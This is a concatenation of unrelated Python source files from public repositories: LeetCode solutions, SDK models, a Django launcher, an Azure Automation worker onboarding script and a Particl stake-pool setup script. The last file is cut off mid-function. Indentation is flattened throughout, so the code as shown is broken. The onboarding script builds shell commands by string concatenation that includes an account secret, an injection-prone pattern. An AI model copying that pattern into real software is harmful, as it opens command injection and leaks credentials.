# File: optur/utils/sorted_trials.py (repo: ytsmiling/optur, license: MIT)

import math
from typing import Callable, List, Optional, Sequence
from optur.proto.study_pb2 import Target, Trial
class TrialQualityFilter:
def __init__(self, *, filter_unknown: bool = True) -> None:
self._filter_unknown = filter_unknown
def __call__(self, trial: Trial) -> bool:
if self._filter_unknown and trial.last_known_state == Trial.State.UNKNOWN:
return False
return True
# Maps each trial to a sort key; smaller keys are better (completed trials get
# their sign-adjusted objective value, everything else gets +inf).
class TrialKeyGenerator:
def __init__(self, targets: Sequence[Target]) -> None:
self._targets = targets
self._target_idx = -1
if (
sum(
target.direction in (Target.Direction.MAXIMIZE, Target.Direction.MINIMIZE)
for target in targets
)
== 1
):
for idx, target in enumerate(targets):
if target.direction in (Target.Direction.MAXIMIZE, Target.Direction.MINIMIZE):
self._target_idx = idx
@property
def is_valid(self) -> bool:
return self._target_idx >= 0
def __call__(self, trial: Trial) -> float:
assert self.is_valid
if trial.last_known_state != Trial.State.COMPLETED:
# TODO(tsuzuku): Check the value when it's PARTIALLY_COMPLETED.
return math.inf
if self._targets[self._target_idx].direction == Target.Direction.MINIMIZE:
return trial.values[self._target_idx].value
else:
return -trial.values[self._target_idx].value
# Strict "less than" comparison (LQ), not "less than or equal" (LE).
# Fail < Partially Failed < Pruned < (Partially Complete, Complete)
# TODO(tsuzuku): This class is not tested yet.
class TrialComparator:
LQ_STATE = {
(Trial.State.FAILED, Trial.State.PARTIALLY_FAILED),
(Trial.State.FAILED, Trial.State.PRUNED),
(Trial.State.FAILED, Trial.State.PARTIALLY_COMPLETED),
(Trial.State.FAILED, Trial.State.COMPLETED),
(Trial.State.PARTIALLY_FAILED, Trial.State.PRUNED),
(Trial.State.PARTIALLY_FAILED, Trial.State.PARTIALLY_COMPLETED),
(Trial.State.PARTIALLY_FAILED, Trial.State.COMPLETED),
(Trial.State.PRUNED, Trial.State.PARTIALLY_COMPLETED),
(Trial.State.PRUNED, Trial.State.COMPLETED),
}
def __init__(self, targets: Sequence[Target]) -> None:
self._targets = targets
def __call__(self, a: Trial, b: Trial) -> bool:
if Trial.State.UNKNOWN in (a.last_known_state, b.last_known_state):
raise RuntimeError()
if a.last_known_state == b.last_known_state:
if a.last_known_state == Trial.State.COMPLETED:
raise NotImplementedError()
elif a.last_known_state == Trial.State.PARTIALLY_COMPLETED:
raise NotImplementedError()
return False
if (a.last_known_state, b.last_known_state) in self.LQ_STATE:
return True
# TODO(tsuzuku): Handle complete & Partially complete.
return False
class SortedTrials:
def __init__(
self,
trial_filter: Callable[[Trial], bool],
trial_key_generator: Optional[Callable[[Trial], float]],
trial_comparator: Optional[Callable[[Trial, Trial], bool]],
) -> None:
assert trial_key_generator is not None or trial_comparator is not None
self._trial_filter = trial_filter
self._trial_key_generator = trial_key_generator
self._trial_comparator = trial_comparator
self._sorted_trials: List[Trial] = []
if self._trial_key_generator is None:
raise NotImplementedError("Multi-objective is not supported yet.")
def sync(self, trials: Sequence[Trial]) -> None:
"""Update an internal data structure using the trials.
When there are duplicated trials, new trials replace old ones.
Let M be the number of trials and N be the length of this list before the sync.
        In a single-objective study, this operation takes O(M log M + N) time.
        In a multi-objective study, this operation takes O(M(M + N)) time.
"""
if not trials:
return
assert self._trial_key_generator is not None, "Only single objective is supported."
sorted_trials = list(
sorted(filter(self._trial_filter, trials), key=self._trial_key_generator)
)
new_trials = {trial.trial_id for trial in sorted_trials}
old_trials = [trial for trial in self._sorted_trials if trial.trial_id not in new_trials]
self._sorted_trials = self._merge_sorted_trials(
old_trials, sorted_trials, self._trial_key_generator
)
@staticmethod
def _merge_sorted_trials(
a: Sequence[Trial], b: Sequence[Trial], trial_key_generator: Callable[[Trial], float]
) -> List[Trial]:
ret: List[Trial] = []
a_idx = 0
b_idx = 0
while a_idx < len(a) and b_idx < len(b):
if trial_key_generator(a[a_idx]) < trial_key_generator(b[b_idx]):
ret.append(a[a_idx])
a_idx += 1
else:
ret.append(b[b_idx])
b_idx += 1
if a_idx == len(a):
ret.extend(b[b_idx:])
else:
ret.extend(a[a_idx:])
return ret
def to_list(self) -> List[Trial]:
"""Convert trials into a list.
Let N be the number of stored trials. Then, this operation takes at most O(N).
"""
assert self._trial_key_generator is not None, "Only single objective is supported."
return self._sorted_trials
def n_trials(self) -> int:
"""The number of stored trials."""
assert self._trial_key_generator is not None, "Only single objective is supported."
return len(self._sorted_trials)
def get_best_trials(self) -> List[Trial]:
pass
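
# A minimal usage sketch (hypothetical names; assumes a single-objective study):
#
#   key_gen = TrialKeyGenerator(targets)
#   if key_gen.is_valid:
#       trials = SortedTrials(TrialQualityFilter(), key_gen, None)
#       trials.sync(all_trials)
#       best_first = trials.to_list()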

# File: app/airtable/attachment.py (repo: WildflowerSchools/wf-airtable-api, license: MIT)

from typing import Dict, Optional
from pydantic import BaseModel, HttpUrl
class AirtableAttachmentThumbnailDetails(BaseModel):
url: HttpUrl
width: int
height: int
class AirtableAttachmentThumbnails(BaseModel):
__root__: Dict[str, AirtableAttachmentThumbnailDetails]
class AirtableAttachment(BaseModel):
id: str
width: Optional[int]
height: Optional[int]
url: HttpUrl
filename: str
size: int
type: str
thumbnails: Optional[AirtableAttachmentThumbnails]
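
# Illustrative example (field values are made up):
#
#   attachment = AirtableAttachment.parse_obj({
#       "id": "attABC123",
#       "url": "https://example.com/photo.png",
#       "filename": "photo.png",
#       "size": 1024,
#       "type": "image/png",
#   })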

# File: src/manage.py (repo: PrashanjeetH/Django-Dynamic-filters, license: MIT)

#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DjFilters.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()

# File: tree/pathsum3.py (repo: manikandan-ravikiran/Leetcode_August_Challenge, license: Apache-2.0)

# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from collections import defaultdict

class Solution:
def pathSum(self, root: TreeNode, sum: int) -> int:
def preorder(node: TreeNode, curr_sum) -> None:
nonlocal count
if not node:
return
# current prefix sum
curr_sum += node.val
# here is the sum we're looking for
if curr_sum == k:
count += 1
# number of times the curr_sum − k has occurred already,
# determines the number of times a path with sum k
# has occurred up to the current node
count += h[curr_sum - k]
# add the current sum into hashmap
# to use it during the child nodes processing
h[curr_sum] += 1
# process left subtree
preorder(node.left, curr_sum)
# process right subtree
preorder(node.right, curr_sum)
# remove the current sum from the hashmap
# in order not to use it during
# the parallel subtree processing
h[curr_sum] -= 1
count, k = 0, sum
h = defaultdict(int)
preorder(root, 0)
return count
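
# Worked example: for the tree [10,5,-3,3,2,None,11,3,-2,None,1] and sum = 8,
# there are three downward paths that total 8: 5->3, 5->2->1, and -3->11.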

# File: Algorithms/Strings/Pangrams.py (repo: gelaim/HackerRank, license: MIT)

#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'pangrams' function below.
#
# The function is expected to return a STRING.
# The function accepts STRING s as parameter.
#
def pangrams(s):
# Write your code here
letters = set(x for x in 'abcdefghijklmnopqrstuvwxyz')
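    # Discard every alphabet letter that appears in s (case-insensitively);
    # a pangram leaves the set empty.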
for i in s:
if i.lower() in letters:
letters.remove(i.lower())
if len(letters)==0:
return 'pangram'
return 'not pangram'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = pangrams(s)
fptr.write(result + '\n')
fptr.close()

# File: Providers/nxOMSAutomationWorker/automationworker/scripts/onboarding.py
# (repo: vtolao/PowerShell-DSC-for-Linux, license: MIT)

#!/usr/bin/env python2
#
# Copyright (C) Microsoft Corporation, All rights reserved.
import ConfigParser
import base64
import datetime
import os
import re
import shutil
import socket
import subprocess
import sys
from optparse import OptionParser
# append worker binary source path
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from worker import configuration
from worker import httpclientfactory
from worker import linuxutil
from worker import serializerfactory
from worker import util
from worker import diydirs
json = serializerfactory.get_serializer(sys.version_info)
configuration.clear_config()
configuration.set_config({configuration.PROXY_CONFIGURATION_PATH: "/etc/opt/microsoft/omsagent/proxy.conf",
configuration.WORKER_VERSION: "LinuxDIYRegister",
configuration.WORKING_DIRECTORY_PATH: "/tmp"})
def get_ip_address():
try:
return socket.gethostbyname(socket.gethostname())
except:
return "127.0.0.1"
DIY_STATE_PATH = diydirs.DIY_STATE_PATH
DIY_WORKING_DIR = diydirs.DIY_WORKING_DIR
def generate_self_signed_certificate(certificate_path, key_path):
"""Creates a self-signed x509 certificate and key pair in the spcified path.
Args:
certificate_path : string, the output path of the certificate
key_path : string, the output path of the key
"""
cmd = ["openssl", "req", "-subj",
"/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=Azure Automation/CN=Hybrid Runbook Worker",
"-new", "-newkey", "rsa:2048", "-days", "365", "-nodes", "-x509", "-keyout", key_path, "-out",
certificate_path]
process, certificate_creation_output, error = linuxutil.popen_communicate(cmd)
if process.returncode != 0:
raise Exception("Unable to create certificate/key. " + str(error))
print "Certificate/Key created."
def sha256_digest(payload):
"""Sha256 digest of the specified payload.
Args:
payload : string, the payload to digest
Returns:
payload_hash : string, the sha256 hash of the payload
"""
cmd = ['echo -n "' + str(json.dumps(json.dumps(payload))) + '" | openssl dgst -sha256 -binary']
process, payload_hash, error = linuxutil.popen_communicate(cmd, shell=True)
if process.returncode != 0:
raise Exception("Unable to generate payload hash. " + str(error))
return payload_hash
def generate_hmac(str_to_sign, secret):
"""Signs the specified string using the specified secret.
Args:
str_to_sign : string, the string to sign
secret : string, the secret used to sign
Returns:
signed_message : string, the signed str_to_sign
"""
message = str_to_sign.encode('utf-8')
secret = secret.encode('utf-8')
cmd = ['echo -n "' + str(message) + '" | openssl dgst -sha256 -binary -hmac "' + str(secret) + '"']
process, signed_message, error = linuxutil.popen_communicate(cmd, shell=True)
if process.returncode != 0:
raise Exception("Unable to generate signature. " + str(error))
return signed_message
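
# Note: sha256_digest() and generate_hmac() shell out to openssl. A roughly
# equivalent in-process sketch using only the standard library (assuming the
# same byte-for-byte input as the shell pipeline produces) would be:
#
#   import hashlib, hmac
#   payload_hash = hashlib.sha256(json.dumps(json.dumps(payload)).encode('utf-8')).digest()
#   signature = hmac.new(secret.encode('utf-8'), str_to_sign.encode('utf-8'),
#                        hashlib.sha256).digest()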
def create_worker_configuration_file(jrds_uri, automation_account_id, worker_group_name, machine_id,
working_directory_path, state_directory_path, cert_path, key_path,
registration_endpoint, workspace_id, thumbprint, vm_id, is_azure_vm,
gpg_keyring_path, test_mode):
"""Creates the automation hybrid worker configuration file.
Args:
jrds_uri : string, the jrds endpoint
automation_account_id : string, the automation account id
worker_group_name : string, the hybrid worker group name
machine_id : string, the machine id
working_directory_path : string, the hybrid worker working directory path
state_directory_path : string, the state directory path
cert_path : string, the the certificate path
key_path : string, the key path
registration_endpoint : string, the registration endpoint
workspace_id : string, the workspace id
thumbprint : string, the certificate thumbprint
is_azure_vm : bool, whether the VM is hosted in Azure
gpg_keyring_path : string, path to the gpg keyring for verifying runbook signatures
test_mode : bool, test mode
Note:
The generated file has to match the latest worker.conf template.
"""
worker_conf_path = os.path.join(state_directory_path, "worker.conf")
config = ConfigParser.ConfigParser()
if os.path.isfile(worker_conf_path):
config.read(worker_conf_path)
conf_file = open(worker_conf_path, 'wb')
worker_required_section = configuration.WORKER_REQUIRED_CONFIG_SECTION
if not config.has_section(worker_required_section):
config.add_section(worker_required_section)
config.set(worker_required_section, configuration.CERT_PATH, cert_path)
config.set(worker_required_section, configuration.KEY_PATH, key_path)
config.set(worker_required_section, configuration.BASE_URI, jrds_uri)
config.set(worker_required_section, configuration.ACCOUNT_ID, automation_account_id)
config.set(worker_required_section, configuration.MACHINE_ID, machine_id)
config.set(worker_required_section, configuration.HYBRID_WORKER_GROUP_NAME, worker_group_name)
config.set(worker_required_section, configuration.WORKING_DIRECTORY_PATH, working_directory_path)
worker_optional_section = configuration.WORKER_OPTIONAL_CONFIG_SECTION
if not config.has_section(worker_optional_section):
config.add_section(worker_optional_section)
config.set(worker_optional_section, configuration.PROXY_CONFIGURATION_PATH,
"/etc/opt/microsoft/omsagent/proxy.conf")
config.set(worker_optional_section, configuration.STATE_DIRECTORY_PATH, state_directory_path)
if gpg_keyring_path is not None:
config.set(worker_optional_section, configuration.GPG_PUBLIC_KEYRING_PATH, gpg_keyring_path)
if test_mode is True:
config.set(worker_optional_section, configuration.BYPASS_CERTIFICATE_VERIFICATION, True)
config.set(worker_optional_section, configuration.DEBUG_TRACES, True)
metadata_section = configuration.METADATA_CONFIG_SECTION
if not config.has_section(metadata_section):
config.add_section(metadata_section)
config.set(metadata_section, configuration.WORKER_TYPE, "diy")
config.set(metadata_section, configuration.IS_AZURE_VM, str(is_azure_vm))
config.set(metadata_section, configuration.VM_ID, vm_id)
registration_metadata_section = "registration-metadata"
if not config.has_section(registration_metadata_section):
config.add_section(registration_metadata_section)
config.set(registration_metadata_section, configuration.REGISTRATION_ENDPOINT, registration_endpoint)
config.set(registration_metadata_section, configuration.WORKSPACE_ID, workspace_id)
config.set(registration_metadata_section, configuration.CERTIFICATE_THUMBPRINT, thumbprint)
config.write(conf_file)
conf_file.close()
def get_autoregistered_worker_account_id():
autoregistered_worker_conf_path = "/var/opt/microsoft/omsagent/state/automationworker/worker.conf"
config = ConfigParser.ConfigParser()
if os.path.isfile(autoregistered_worker_conf_path) is False:
print "No diy worker found. Account validation skipped."
return None
config.read(autoregistered_worker_conf_path)
account_id = config.get("worker-required", "account_id")
print "Found existing worker for account id : " + str(account_id)
return account_id
def extract_account_id_from_registration_endpoint(registration_endpoint):
account_id = re.findall("[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}",
registration_endpoint.lower())
if len(account_id) != 1:
raise Exception("Invalid registration endpoint format.")
return account_id[0]
def invoke_dmidecode():
"""Gets the dmidecode output from the host."""
proc = subprocess.Popen(["su", "-", "root", "-c", "dmidecode"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
dmidecode, error = proc.communicate()
if proc.poll() != 0:
raise Exception("Unable to get dmidecode output : " + str(error))
return dmidecode
def register(options):
"""Registers the machine against the automation agent service.
Args:
options : dict, the options dictionary
"""
registration_endpoint = options.registration_endpoint
automation_account_key = options.automation_account_key
hybrid_worker_group_name = options.hybrid_worker_group_name
workspace_id = options.workspace_id
# assert workspace exists on the box
state_base_path = "/var/opt/microsoft/omsagent/" + workspace_id + "/state/"
working_directory_base_path = "/var/opt/microsoft/omsagent/" + workspace_id + "/run/"
if os.path.exists(state_base_path) is False or os.path.exists(working_directory_base_path) is False:
raise Exception("Invalid workspace id. Is the specified workspace id registered as the OMSAgent "
"primary worksapce?")
diy_account_id = extract_account_id_from_registration_endpoint(registration_endpoint)
auto_registered_account_id = get_autoregistered_worker_account_id()
if auto_registered_account_id != None and auto_registered_account_id != diy_account_id:
raise Exception("Cannot register, conflicting worker already registered.")
worker_conf_path = os.path.join(DIY_STATE_PATH, "worker.conf")
if os.path.isfile(worker_conf_path) is True:
raise Exception("Unable to register, an existing worker was found. Please deregister any existing worker and "
"try again.")
certificate_path = os.path.join(DIY_STATE_PATH, "worker_diy.crt")
key_path = os.path.join(DIY_STATE_PATH, "worker_diy.key")
machine_id = util.generate_uuid()
# generate state path (certs/conf will be dropped in this path)
if os.path.isdir(DIY_STATE_PATH) is False:
os.makedirs(DIY_STATE_PATH)
generate_self_signed_certificate(certificate_path=certificate_path, key_path=key_path)
issuer, subject, thumbprint = linuxutil.get_cert_info(certificate_path)
# try to extract optional metadata
unknown = "Unknown"
asset_tag = unknown
vm_id = unknown
is_azure_vm = False
try:
dmidecode = invoke_dmidecode()
is_azure_vm = linuxutil.is_azure_vm(dmidecode)
if is_azure_vm:
asset_tag = linuxutil.get_azure_vm_asset_tag()
else:
asset_tag = False
vm_id = linuxutil.get_vm_unique_id_from_dmidecode(sys.byteorder, dmidecode)
except Exception, e:
print str(e)
pass
# generate payload for registration request
date = datetime.datetime.utcnow().isoformat() + "0-00:00"
payload = {'RunbookWorkerGroup': hybrid_worker_group_name,
"MachineName": socket.gethostname().split(".")[0],
"IpAddress": get_ip_address(),
"Thumbprint": thumbprint,
"Issuer": issuer,
"OperatingSystem": 2,
"SMBIOSAssetTag": asset_tag,
"VirtualMachineId": vm_id,
"Subject": subject}
# the signature generation is based on agent service contract
payload_hash = sha256_digest(payload)
b64encoded_payload_hash = base64.b64encode(payload_hash)
signature = generate_hmac(b64encoded_payload_hash + "\n" + date, automation_account_key)
b64encoded_signature = base64.b64encode(signature)
headers = {'Authorization': 'Shared ' + b64encoded_signature,
'ProtocolVersion': "2.0",
'x-ms-date': date,
"Content-Type": "application/json"}
# agent service registration request
http_client_factory = httpclientfactory.HttpClientFactory(certificate_path, key_path, options.test)
http_client = http_client_factory.create_http_client(sys.version_info)
url = registration_endpoint + "/HybridV2(MachineId='" + machine_id + "')"
response = http_client.put(url, headers=headers, data=payload)
if response.status_code != 200:
raise Exception("Failed to register worker. [response_status=" + str(response.status_code) + "]")
registration_response = json.loads(response.raw_data)
account_id = registration_response["AccountId"]
create_worker_configuration_file(registration_response["jobRuntimeDataServiceUri"], account_id,
hybrid_worker_group_name, machine_id, DIY_WORKING_DIR,
DIY_STATE_PATH, certificate_path, key_path, registration_endpoint,
workspace_id, thumbprint, vm_id, is_azure_vm, options.gpg_keyring, options.test)
# generate working directory path
diydirs.create_persistent_diy_dirs()
print "Registration successful!"
def deregister(options):
registration_endpoint = options.registration_endpoint
automation_account_key = options.automation_account_key
workspace_id = options.workspace_id
# assert workspace exists on the box
state_base_path = "/var/opt/microsoft/omsagent/" + workspace_id + "/state/"
working_directory_base_path = "/var/opt/microsoft/omsagent/" + workspace_id + "/run/"
if os.path.exists(state_base_path) is False or os.path.exists(working_directory_base_path) is False:
raise Exception("Invalid workspace id. Is the specified workspace id registered as the OMSAgent "
"primary worksapce?")
worker_conf_path = os.path.join(DIY_STATE_PATH, "worker.conf")
certificate_path = os.path.join(DIY_STATE_PATH, "worker_diy.crt")
key_path = os.path.join(DIY_STATE_PATH, "worker_diy.key")
if os.path.exists(worker_conf_path) is False:
raise Exception("Unable to deregister, no worker configuration found on disk.")
if os.path.exists(certificate_path) is False or os.path.exists(key_path) is False:
raise Exception("Unable to deregister, no worker certificate/key found on disk.")
issuer, subject, thumbprint = linuxutil.get_cert_info(certificate_path)
if os.path.exists(worker_conf_path) is False:
raise Exception("Missing worker configuration.")
if os.path.exists(certificate_path) is False:
raise Exception("Missing worker certificate.")
if os.path.exists(key_path) is False:
raise Exception("Missing worker key.")
config = ConfigParser.ConfigParser()
config.read(worker_conf_path)
machine_id = config.get("worker-required", "machine_id")
# generate payload for registration request
date = datetime.datetime.utcnow().isoformat() + "0-00:00"
payload = {"Thumbprint": thumbprint,
"Issuer": issuer,
"Subject": subject}
# the signature generation is based on agent service contract
payload_hash = sha256_digest(payload)
b64encoded_payload_hash = base64.b64encode(payload_hash)
signature = generate_hmac(b64encoded_payload_hash + "\n" + date, automation_account_key)
b64encoded_signature = base64.b64encode(signature)
headers = {'Authorization': 'Shared ' + b64encoded_signature,
'ProtocolVersion': "2.0",
'x-ms-date': date,
"Content-Type": "application/json"}
# agent service registration request
http_client_factory = httpclientfactory.HttpClientFactory(certificate_path, key_path, options.test)
http_client = http_client_factory.create_http_client(sys.version_info)
url = registration_endpoint + "/Hybrid(MachineId='" + machine_id + "')"
response = http_client.delete(url, headers=headers, data=payload)
if response.status_code != 200:
raise Exception("Failed to deregister worker. [response_status=" + str(response.status_code) + "]")
if response.status_code == 404:
raise Exception("Unable to deregister. Worker not found.")
print "Successfuly deregistered worker."
print "Cleaning up left over directories."
try:
shutil.rmtree(DIY_STATE_PATH)
print "Removed state directory."
except:
raise Exception("Unable to remove state directory base path.")
try:
shutil.rmtree(DIY_WORKING_DIR)
print "Removed working directory."
except:
raise Exception("Unable to remove working directory base path.")
def environment_prerequisite_validation():
"""Validates that basic environment requirements are met for the onboarding operations."""
nxautomation_username = "nxautomation"
if linuxutil.is_existing_user(nxautomation_username) is False:
raise Exception("Missing user : " + nxautomation_username + ". Are you running the lastest OMSAgent version?")
omsagent_username = "omsagent"
if linuxutil.is_existing_user(omsagent_username) is False:
raise Exception("Missing user : " + omsagent_username + ".")
omiusers_group_name = "omiusers"
if linuxutil.is_existing_group(omiusers_group_name) is False:
raise Exception("Missing group : " + omiusers_group_name + ".")
nxautomation_group_name = "nxautomation"
if linuxutil.is_existing_group(omiusers_group_name) is False:
raise Exception("Missing group : " + nxautomation_group_name + ".")
def get_options_and_arguments():
parser = OptionParser(
usage="usage: %prog [--register, --deregister] -e endpoint -k key -g groupname -w workspaceid [-p gpgkeyring]",
version="%prog " + str(configuration.get_worker_version()))
parser.add_option("-e", "--endpoint", dest="registration_endpoint", help="Agent service registration endpoint.")
parser.add_option("-k", "--key", dest="automation_account_key", help="Automation account primary/secondary key.")
parser.add_option("-g", "--groupname", dest="hybrid_worker_group_name", help="Hybrid worker group name.")
parser.add_option("-w", "--workspaceid", dest="workspace_id", help="Workspace id.")
parser.add_option("-r", "--register", action="store_true", dest="register", default=False)
parser.add_option("-d", "--deregister", action="store_true", dest="deregister", default=False)
parser.add_option("-t", "--test", action="store_true", dest="test", default=False)
parser.add_option("-p", "--gpg-keyring", dest="gpg_keyring", help="GPG keyring path")
(options, args) = parser.parse_args()
if options.register is False and options.deregister is False:
raise Exception("Please specify the onboarding action to perform (--register | --deregister).")
# --register requirements
if options.register is True and (options.registration_endpoint is not None
and options.automation_account_key is not None
and options.hybrid_worker_group_name is not None
and options.workspace_id is not None) is False:
parser.print_help()
sys.exit(-1)
# --deregister requirements
elif options.deregister is True and (options.registration_endpoint is not None
and options.automation_account_key is not None
and options.hybrid_worker_group_name is not None
and options.workspace_id is not None) is False:
parser.print_help()
sys.exit(-1)
elif options.register is False and options.deregister is False:
parser.print_help()
sys.exit(-1)
return options, args
def main():
options, args = get_options_and_arguments()
environment_prerequisite_validation()
if options.register is True:
register(options)
elif options.deregister is True:
deregister(options)
if __name__ == "__main__":
# is running as root
if os.getuid() != 0:
raise Exception("You need to run this script as root to register a new automation worker.")
    # Required for cases where the DIY registration is triggered before the worker manager starts (.pyc files will be owned by root in that case and have to be owned by omsagent:omiusers)
proc = subprocess.Popen(["find",
"/opt/microsoft/omsconfig/modules/nxOMSAutomationWorker/DSCResources/MSFT_nxOMSAutomationWorkerResource/automationworker/",
"-type", "f", "-name", "*.pyc", "-exec", "rm", "{}", "+"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, error = proc.communicate()
if proc.returncode != 0:
raise Exception("Unable to remove root-owned .pyc")
main()

# File: leetcode-algorithms/237. Delete Node in a Linked List/237.delete-node-in-a-linked-list.py
# (repo: cnyy7/LeetCode_EY, license: MIT)

#
# @lc app=leetcode id=237 lang=python3
#
# [237] Delete Node in a Linked List
#
# https://leetcode.com/problems/delete-node-in-a-linked-list/description/
#
# algorithms
# Easy (53.89%)
# Likes: 834
# Dislikes: 3998
# Total Accepted: 305.5K
# Total Submissions: 556.4K
# Testcase Example: '[4,5,1,9]\n5'
#
# Write a function to delete a node (except the tail) in a singly linked list,
# given only access to that node.
#
# Given linked list -- head = [4,5,1,9], which looks like following:
#
#
#
#
#
# Example 1:
#
#
# Input: head = [4,5,1,9], node = 5
# Output: [4,1,9]
# Explanation: You are given the second node with value 5, the linked list
# should become 4 -> 1 -> 9 after calling your function.
#
#
# Example 2:
#
#
# Input: head = [4,5,1,9], node = 1
# Output: [4,5,9]
# Explanation: You are given the third node with value 1, the linked list
# should become 4 -> 5 -> 9 after calling your function.
#
#
#
#
# Note:
#
#
# The linked list will have at least two elements.
# All of the nodes' values will be unique.
# The given node will not be the tail and it will always be a valid node of the
# linked list.
# Do not return anything from your function.
#
#
#
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def deleteNode(self, node):
"""
:type node: ListNode
:rtype: void Do not return anything, modify node in-place instead.
"""
node.val, node.next = node.next.val, node.next.next

# File: ask_sdk_model/permission_status.py
# (repos: adamash99/alexa-play-pot-of-greed [MIT]; ishitaojha/alexa-apis-for-python [Apache-2.0])

# coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union, Any
from datetime import datetime
class PermissionStatus(Enum):
"""
This denotes the status of the permission scope.
Allowed enum values: [GRANTED, DENIED]
"""
GRANTED = "GRANTED"
DENIED = "DENIED"
def to_dict(self):
# type: () -> Dict[str, Any]
"""Returns the model properties as a dict"""
result = {self.name: self.value}
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.value)
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (Any) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, PermissionStatus):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (Any) -> bool
"""Returns true if both objects are not equal"""
return not self == other
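
# Example: PermissionStatus.GRANTED.to_dict() returns {'GRANTED': 'GRANTED'}.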

# File: bin/coldstakepool_prepare.py (repo: AllienWorks/particl-coldstakepool, license: MIT)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2019 The Particl Core developers
# Distributed under the MIT software license, see the accompanying
# file LICENSE.txt or http://www.opensource.org/licenses/mit-license.php.
"""
Minimal example of starting a Particl stake pool.
1. Download and verify a particl-core release.
2. Create a particl.conf that:
- Starts 2 wallets
- Enables zmqpubhashblock
- Enables csindex and addressindex
3. Generate and import a recovery phrase for both wallets.
4. Generate the pool_stake_address from the staking wallet.
- The address pool participants will set their outputs to stake with.
5. Generate the pool_reward_address from the reward wallet.
- The address that will collect the rewards for blocks staked by the pool.
6. Disable staking on the reward wallet.
7. Set the reward address of the staking wallet.
8. Create the stakepool.json configuration file.
Install dependencies:
apt-get install wget gnupg
Run the prepare script:
coldstakepool-prepare.py -datadir=~/stakepoolDemoTest -testnet
Start the daemon:
~/particl-binaries/particld -datadir=/home/$(id -u -n)/stakepoolDemoTest
Start the pool script:
coldstakepool-run.py -datadir=~/stakepoolDemoTest/stakepool -testnet
"""
import sys
import os
import subprocess
import time
import json
import hashlib
import mmap
import urllib.request
from coldstakepool.util import (
callrpc_cli,
)
PARTICL_BINDIR = os.path.expanduser(os.getenv('PARTICL_BINDIR', '~/particl-binaries'))
PARTICLD = os.getenv('PARTICLD', 'particld')
PARTICL_CLI = os.getenv('PARTICL_CLI', 'particl-cli')
PARTICL_TX = os.getenv('PARTICL_CLI', 'particl-tx')
PARTICL_VERSION = os.getenv('PARTICL_VERSION', '0.18.0.10')
PARTICL_VERSION_TAG = os.getenv('PARTICL_VERSION_TAG', '')
PARTICL_ARCH = os.getenv('PARTICL_ARCH', 'x86_64-linux-gnu.tar.gz')
def startDaemon(nodeDir, bindir):
command_cli = os.path.join(bindir, PARTICLD)
args = [command_cli, '-daemon', '-connect=0', '-datadir=' + nodeDir]
p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = p.communicate()
if len(out[1]) > 0:
raise ValueError('Daemon error ' + str(out[1]))
return out[0]
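
# Note: AppPrepare below is unused in this script and references helper methods
# (parse_args, get_app_name) that are not defined here.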
class AppPrepare():
def __init__(self, mode='normal', test_param=None):
# Validate and process argument options
self.parse_args(mode, test_param)
# Initialize database connection
self.app_name = self.get_app_name(self.name)
def downloadParticlCore():
print('Download and verify Particl core release.')
if 'osx' in PARTICL_ARCH:
os_dir_name = 'osx-unsigned'
os_name = 'osx'
elif 'win32-setup' in PARTICL_ARCH or 'win64-setup' in PARTICL_ARCH:
os_dir_name = 'win-signed'
os_name = 'win-signer'
elif 'win32' in PARTICL_ARCH or 'win64' in PARTICL_ARCH:
os_dir_name = 'win-unsigned'
os_name = 'win'
else:
os_dir_name = 'linux'
os_name = 'linux'
signing_key_fingerprint = '8E517DC12EC1CC37F6423A8A13F13651C9CF0D6B'
signing_key_name = 'tecnovert'
if os_dir_name == 'win-signed':
url_sig = 'https://raw.githubusercontent.com/particl/gitian.sigs/master/%s-%s/%s/particl-%s' % (PARTICL_VERSION + PARTICL_VERSION_TAG, os_dir_name, signing_key_name, os_name)
assert_path = os.path.join(PARTICL_BINDIR, 'particl-%s-build.assert' % (os_name))
else:
url_sig = 'https://raw.githubusercontent.com/particl/gitian.sigs/master/%s-%s/%s/particl-%s-%s' % (PARTICL_VERSION + PARTICL_VERSION_TAG, os_dir_name, signing_key_name, os_name, PARTICL_VERSION)
assert_path = os.path.join(PARTICL_BINDIR, 'particl-%s-%s-build.assert' % (os_name, PARTICL_VERSION))
url_release = 'https://github.com/particl/particl-core/releases/download/v%s/particl-%s-%s' % (PARTICL_VERSION + PARTICL_VERSION_TAG, PARTICL_VERSION, PARTICL_ARCH)
if not os.path.exists(assert_path):
